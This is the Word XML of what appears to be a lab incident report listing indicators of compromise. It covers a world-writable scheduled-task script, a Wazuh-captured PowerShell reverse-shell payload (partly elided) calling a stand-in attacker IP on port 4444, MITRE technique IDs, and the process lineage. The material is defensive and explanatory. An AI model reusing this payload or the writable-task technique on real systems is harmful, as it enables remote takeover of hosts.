    <w:p w:rsidR="00F8290C" w:rsidP="000C051C" w:rsidRDefault="00F8290C" w14:paraId="4DA53639" w14:textId="77777777"/>
    <w:p w:rsidR="00353AB6" w:rsidP="000C051C" w:rsidRDefault="00353AB6" w14:paraId="6D5DE0BF" w14:textId="77777777"/>
    <w:p w:rsidR="000C051C" w:rsidP="000C051C" w:rsidRDefault="00E30B74" w14:paraId="7ABE0CF3" w14:textId="6D11450F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Indicators of Compromise (IoCs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E30B74" w:rsidR="00F8290C" w:rsidP="000C051C" w:rsidRDefault="00F8290C" w14:paraId="5993982D" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A6181" w:rsidP="000E7E9E" w:rsidRDefault="002376A2" w14:paraId="3A325E30" w14:textId="27847467">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Host-based IoCs (The Clues inside the Computer) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(These are changes made directly to the files on the Windows machine.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000A6181" w:rsidR="000A6181" w:rsidP="000E7E9E" w:rsidRDefault="000A6181" w14:paraId="64C988B7" w14:textId="33FCD051">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="008847FC" w:rsidR="008847FC" w:rsidP="008847FC" w:rsidRDefault="008847FC" w14:paraId="36E4B974" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Writable Task Script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This is the "unlocked door." The file cleanup.ps1 allowed unauthorized users to modify its contents. In a secured system, only the "Boss" (Admin/SYSTEM) should have write access, but here, even a "Guest" (Authenticated User) could overwrite it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008847FC" w:rsidR="008847FC" w:rsidP="008847FC" w:rsidRDefault="008847FC" w14:paraId="7FAB7356" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>C:\TaskScripts\cleanup.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008847FC" w:rsidR="008847FC" w:rsidP="008847FC" w:rsidRDefault="008847FC" w14:paraId="6F74AAD1" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Value: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Only SYSTEM and Administrators should have "Write/Modify" permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00233B66" w:rsidR="008847FC" w:rsidP="008847FC" w:rsidRDefault="008847FC" w14:paraId="69CA0870" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromise Indicator: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Authenticated Users group has "FullControl" access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008847FC" w:rsidR="00233B66" w:rsidP="00233B66" w:rsidRDefault="00233B66" w14:paraId="0637F730" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="008847FC" w:rsidR="008847FC" w:rsidP="008847FC" w:rsidRDefault="008847FC" w14:paraId="06B29BEA" w14:textId="08E6AC53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious ScriptBlock: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This is the "recorded footage." The security tool (Wazuh) caught the exact moment the malicious code ran. It recorded a specific ID number and the exact PowerShell commands that told the computer to "call" the attacker's IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008847FC" w:rsidR="008847FC" w:rsidP="008847FC" w:rsidRDefault="008847FC" w14:paraId="0D1410B7" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>ScriptBlock ID:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> d21a34ef-dc19-4470-a39d-cf9f4578d83e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008847FC" w:rsidR="008847FC" w:rsidP="008847FC" w:rsidRDefault="008847FC" w14:paraId="55D1F281" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Content (Captured Payload):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> ```powershell $c = New-Object System.Net.Sockets.TCPClient("&lt;ATTACKER_IP&gt;", 4444); $s = $c.GetStream(); [byte[]]$b = 0..65535|%{0}; ... $sendbyte = ([text.encoding]::ASCII).GetBytes("PS " + (Get-Location).Path + "&gt; ");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="008847FC" w:rsidR="008847FC" w:rsidP="008847FC" w:rsidRDefault="008847FC" w14:paraId="72511747" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Significance: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The log specifically shows the use of System.Net.Sockets.TCPClient to connect to &lt;ATTACKER_IP&gt; on port 4444, which is characteristic of a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002376A2" w:rsidP="002376A2" w:rsidRDefault="002376A2" w14:paraId="6AECF5AD" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00404DCF" w:rsidP="002376A2" w:rsidRDefault="00404DCF" w14:paraId="46709324" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00956AEB" w:rsidR="00C3112D" w:rsidP="002376A2" w:rsidRDefault="002376A2" w14:paraId="5BB048DC" w14:textId="5D1531FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Command-line / Configuration IoCs (The "How") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>This explains the "behavior" of the computer during the attack.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C06F13" w:rsidP="00C06F13" w:rsidRDefault="00C06F13" w14:paraId="0C4E87FE" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00CC442B" w:rsidR="00CC442B" w:rsidP="00CC442B" w:rsidRDefault="00CC442B" w14:paraId="594CBA7F" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh Detection Pattern: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This is like a security alarm going off because it saw someone wearing a mask. The alarm (specifically Rule T1059.001) triggered because it saw PowerShell being used to run code from a "string" (text), which is a common trick used by hackers to hide their real intentions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00CC442B" w:rsidR="00CC442B" w:rsidP="00CC442B" w:rsidRDefault="00CC442B" w14:paraId="6F9B7FBD" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Rule ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>T1059.001 (Command and Scripting Interpreter: PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00436405" w:rsidR="00CC442B" w:rsidP="00CC442B" w:rsidRDefault="00CC442B" w14:paraId="3B805B30" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Activity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The telemetry shows the execution of Invoke-Expression (IEX) and Get-Content -Stream patterns, which are used to convert text strings into executable commands in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00CC442B" w:rsidR="00436405" w:rsidP="00436405" w:rsidRDefault="00436405" w14:paraId="7F5689E9" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00CC442B" w:rsidR="00CC442B" w:rsidP="00CC442B" w:rsidRDefault="00CC442B" w14:paraId="46371F12" w14:textId="1B293309">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Alert Level: High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC442B" w:rsidP="00CC442B" w:rsidRDefault="00CC442B" w14:paraId="4BAFDF30" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Chain: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This is the "family tree" of the attack. It shows that the Task Scheduler (the parent) started PowerShell (the child), which then immediately reached out to the internet. Normally, a simple cleanup script shouldn't be making "phone calls" to an external IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00CC442B" w:rsidR="00436405" w:rsidP="00CC442B" w:rsidRDefault="00436405" w14:paraId="3E5C1532" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00CC442B" w:rsidR="00CC442B" w:rsidP="00CC442B" w:rsidRDefault="00CC442B" w14:paraId="351212A0" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Lineage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>svchost.exe (Task Scheduler Service) $\rightarrow$ powershell.exe (Running the hijacked script) $\rightarrow$ Network Connection established to &lt;ATTACKER_IP&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00CC442B" w:rsidR="00CC442B" w:rsidP="00CC442B" w:rsidRDefault="00CC442B" w14:paraId="116143F8" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Parent Process ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The logs identify the parent as the system service responsible for scheduled tasks, confirming the T1053.005 technique was used for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00933634" w:rsidP="00500AD9" w:rsidRDefault="00933634" w14:paraId="57791AB1" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D2F8F" w:rsidP="00500AD9" w:rsidRDefault="006D2F8F" w14:paraId="37D7675A" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00CF5C87" w:rsidR="009B3923" w:rsidP="002376A2" w:rsidRDefault="002376A2" w14:paraId="69906D70" w14:textId="5595F348">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Network IoCs (The "Where") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>(This shows where the stolen data or the "phone call" went.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B3923" w:rsidR="009B3923" w:rsidP="009B3923" w:rsidRDefault="009B3923" w14:paraId="64C36363" w14:textId="46192E9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3923" w:rsidP="000D7184" w:rsidRDefault="009B3923" w14:paraId="4D1E02B4" w14:textId="7E8947CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Reverse Shell Callback:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the actual connection. It shows the "Source" (your Windows machine &lt;VICTIM_IP&gt;) calling the "Destination" (the Kali Linux machine &lt;ATTACKER_IP&gt;). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Port 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the specific "doorway" they used to talk to each other.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00680EA3" w:rsidR="00680EA3" w:rsidP="002E72EC" w:rsidRDefault="00680EA3" w14:paraId="17A69C97" w14:textId="7335DF72">
